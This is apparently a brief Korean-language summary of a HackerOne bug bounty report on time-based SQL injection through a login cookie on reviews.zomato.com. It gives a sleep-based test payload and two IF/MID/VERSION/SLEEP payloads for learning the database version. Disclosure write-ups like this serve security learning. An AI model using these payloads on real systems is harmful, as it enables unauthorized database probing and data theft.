hackerone-eternal-2018-02-c-300176
[https://reviews.zomato.com] Time Based SQL Injection
로그인 도중 제출되는 이상한 이름의 쿠키가 있었다.
그래서 여기에 SQLi 퍼징을 돌려보았다.
1’=sleep(10)=‘1 와 같은 페이로드가 가능했다.
이를 이용하여 time based SQLi로 버전을 알아내는 PoC를 했다.
'=IF(MID(VERSION(),1,1)=1,SLEEP(10),0)='1
'=IF(MID(VERSION(),1,1)=5,SLEEP(10),0)='1
tags: wstg-inpv-05, bughunting, sqli, time-based-sqli, web hacking, severity critical